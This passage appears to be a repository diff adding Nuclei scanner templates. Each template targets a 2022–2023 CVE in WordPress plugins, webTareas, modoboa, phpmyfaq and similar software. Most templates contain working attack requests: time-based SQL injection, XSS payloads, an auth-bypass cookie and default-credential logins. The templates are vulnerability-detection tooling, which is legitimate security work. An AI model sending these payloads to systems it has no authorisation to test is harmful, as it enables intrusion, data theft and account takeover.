action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)
attack: clusterbomb
payloads:
path:
- "/index.php/user/"
- "/user"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header_2, "text/html")
- contains(body_2, 'Invalid Access')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
internal: true

42
http/cves/2022/CVE-2022-4059.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2022-4059
info:
name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
remediation: Fixed in version 2.0
reference:
- https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
- https://nvd.nist.gov/vuln/detail/CVE-2022-4059
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4059
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/"
tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli
http:
- raw:
- |
@timeout: 20s
GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration_1>=7'
- 'len(body_1) == 0'
- 'status_code_1 == 302'
- 'contains(body_2, "Cryptocurrency Widgets Pack")'
condition: and

36
http/cves/2022/CVE-2022-4305.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-4305
info:
name: Login as User or Customer < 3.3 - Privilege Escalation
author: r3Y3r53
severity: critical
description: |
The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
remediation: Fixed in version 3.3
reference:
- https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
- https://nvd.nist.gov/vuln/detail/CVE-2022-4305
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4305
cwe-id: CWE-269
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/login-as-customer-or-user"
tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
Host: {{Hostname}}
Cookie: loginas_old_user_id=1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html") && contains(content_type, "Dashboard")'
condition: and

61
http/cves/2022/CVE-2022-44290.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-44290
info:
name: WebTareas 2.4p5 - SQL Injection
author: theamanrawat
severity: critical
description: |
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2022-44290
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-44290
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
tags: cve,cve2022,sqli,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
@timeout: 20s
GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body, 'Delete the following?')
condition: and

61
http/cves/2022/CVE-2022-44291.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-44291
info:
name: WebTareas 2.4p5 - SQL Injection
author: theamanrawat
severity: critical
description: |
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2022-44291
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-44291
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2022,sqli,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
@timeout: 20s
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'len(body_2) == 0'
- 'status_code_2 == 302'
- 'contains(header_2, "text/html")'
- 'contains(body_1, "webTareasSID")'
condition: and

166
http/cves/2022/CVE-2022-44957.yaml Normal file
View File

@ -0,0 +1,166 @@
id: CVE-2022-44957
info:
name: WebTareas 2.4p5 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/11
- https://nvd.nist.gov/vuln/detail/CVE-2022-44957
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44957
cwe-id: CWE-79
metadata:
max-request: 3
verified: true
tags: cve,cve2022,xss,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
GET /clients/editclient.php? HTTP/1.1
Host: {{Hostname}}
- |
POST /clients/editclient.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="csrfToken"
{{csrf}}
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="action"
add
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cown"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cn"
{{randstr}}<details/open/ontoggle=alert(document.domain)>
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="add"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="zip"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="ct"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cou"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="wp"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="fa"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="url"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="email"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="curr"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="wc"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="pym"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="pyt"
7
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="c"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="ssc"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="attnam1"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="atttmp1"
-----------------------------34025600472463336623659912061--
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '<details/open/ontoggle=alert(document.domain)>'
- 'clients/listclients.php?'
condition: and
- type: word
part: header_3
words:
- text/html
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrfToken" value="([0-9a-zA-Z]+)"'
internal: true

51
http/cves/2022/CVE-2022-45365.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2022-45365
info:
name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting
author: theamanrawat
severity: medium
description: |
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability
- https://wordpress.org/plugins/stock-ticker/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45365
remediation: Fixed in version 3.23.3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-45365
cwe-id: CWE-79
metadata:
verified: "true"
publicwww-query: "/wp-content/plugins/stock-ticker/"
max-request: 1
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Stock Ticker Fatal"
- "<IMG SRC=X ONERROR="
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

31
http/cves/2022/CVE-2022-47075.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2022-47075
info:
name: Smart Office Web 20.28 - Information Disclosure
author: r3Y3r53
severity: high
description: |
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
reference:
- https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47075
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-47075
metadata:
verified: true
tags: cve,cve2022,smart-office,info,exposure
http:
- method: GET
path:
- "{{BaseURL}}/ExportReportingManager.aspx"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/CSV")'
- 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
condition: and

34
http/cves/2023/CVE-2023-0334.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-0334
info:
name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin
reference:
- https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931
- https://nvd.nist.gov/vuln/detail/CVE-2023-0334
remediation: Fixed in version 3.6.3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/shortpixel-adaptive-images/"
tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images
http:
- method: GET
path:
- "{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")'
condition: and

40
http/cves/2023/CVE-2023-0600.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2023-0600
info:
name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
author: r3Y3r53
severity: high
description: |
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
remediation: Fixed in version 6.9
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
public-www: "/wp-content/plugins/wp-stats-manager/"
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli
variables:
str: '{{rand_int(100000, 999999)}}'
http:
- raw:
- |
@timeout: 30s
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "sleep(10)")'
condition: and

37
http/cves/2023/CVE-2023-0602.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2023-0602
info:
name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
reference:
- https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
- https://nvd.nist.gov/vuln/detail/CVE-2023-0602
- https://wordpress.org/plugins/twittee-text-tweet/
metadata:
verified: true
max-request: 2
tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")'
condition: and

66
http/cves/2023/CVE-2023-0777.yaml Normal file
View File

@ -0,0 +1,66 @@
id: CVE-2023-0777
info:
name: modoboa 2.0.4 - Admin TakeOver
author: r3Y3r53
severity: critical
description: |
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
remediation: update to version 2.0.4
reference:
- https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/
- http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0777
cwe-id: CWE-305
cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: html:"Modoboa"
fofa-query: body="Modoboa"
tags: modoboa,default-login
http:
- raw:
- |
GET /accounts/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /accounts/login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F
- |
GET /dashboard/ HTTP/1.1
Host: {{Hostname}}
payloads:
username:
- admin
password:
- password
attack: pitchfork
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")'
condition: and
extractors:
- type: regex
part: header
name: csrftoken
internal: true
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)

63
http/cves/2023/CVE-2023-0900.yaml Normal file
View File

@ -0,0 +1,63 @@
id: CVE-2023-0900
info:
name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
reference:
- https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
- https://github.com/WPPlugins/ap-pricing-tables-lite
- https://nvd.nist.gov/vuln/detail/CVE-2023-0900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-0900
cwe-id: CWE-89
metadata:
max-request: 3
verified: true
publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_3>=5'
- 'status_code_3 == 200'
- 'contains(body_3, "Security check")'
- 'contains(body_2, "ap-pricing-tables-lite")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '_wpnonce=([0-9a-z]+)">Log Out'
internal: true

34
http/cves/2023/CVE-2023-0947.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-0947
info:
name: Flatpress < 1.3 - Path Traversal
author: r3Y3r53
severity: critical
description: |
Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
reference:
- https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0947
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.favicon.hash:-1189292869
tags: cve,cve2023,lfi,flatpress,listing
http:
- method: GET
path:
- "{{BaseURL}}/fp-content/"
- "{{BaseURL}}/flatpress/fp-content/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<title>Index of /fp-content</title>")'
condition: and

52
http/cves/2023/CVE-2023-1263.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2023-1263
info:
name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
author: r3Y3r53
severity: medium
description: |
The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
reference:
- https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b
- https://nvd.nist.gov/vuln/detail/CVE-2023-1263
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure
- https://wordpress.org/plugins/cmp-coming-soon-maintenance/
remediation: Fixed in version 4.1.7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-1263
cwe-id: CWE-862
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/"
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=cmp_get_post_detail&id=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"img":'
- '"date":'
- '"title":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

44
http/cves/2023/CVE-2023-1408.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-1408
info:
name: Video List Manager <= 1.7 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
reference:
- https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
- https://wordpress.org/plugins/video-list-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1408
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-1408
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 200'
- 'contains_all(body_2, "Edit Video","Youtube</option>")'
condition: and

44
http/cves/2023/CVE-2023-1780.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-1780
info:
name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 4.5.3
reference:
- https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
- https://nvd.nist.gov/vuln/detail/CVE-2023-1780
classification:
cve-id: CVE-2023-1780
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "re not allowed to view")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
condition: and

35
http/cves/2023/CVE-2023-1880.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-1880
info:
name: Phpmyfaq v3.1.11 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
remediation: Fixed in 3.1.12 Version.
reference:
- https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1880
- https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 1
verified: true
shodan-query: http.html:"phpmyfaq"
tags: cve,cve2023,xss,phpmyfaq
http:
- method: GET
path:
- "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
condition: and

56
http/cves/2023/CVE-2023-2009.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2023-2009
info:
name: Pretty Url <= 1.5.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
reference:
- https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
- https://nvd.nist.gov/vuln/detail/CVE-2023-2009
- https://wordpress.org/plugins/pretty-url/
metadata:
verified: true
max-request: 3
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=((username))&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
redirects: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
- 'contains(body_3, "prettyurls")'
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'

44
http/cves/2023/CVE-2023-2779.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-2779
info:
name: Super Socializer < 7.13.52 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 7.13.52
reference:
- https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
- https://nvd.nist.gov/vuln/detail/CVE-2023-2779
- https://wordpress.org/plugins/super-socializer/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/super-socializer/"
tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
condition: and

38
http/cves/2023/CVE-2023-27922.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-27922
info:
name: Newsletter < 7.6.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
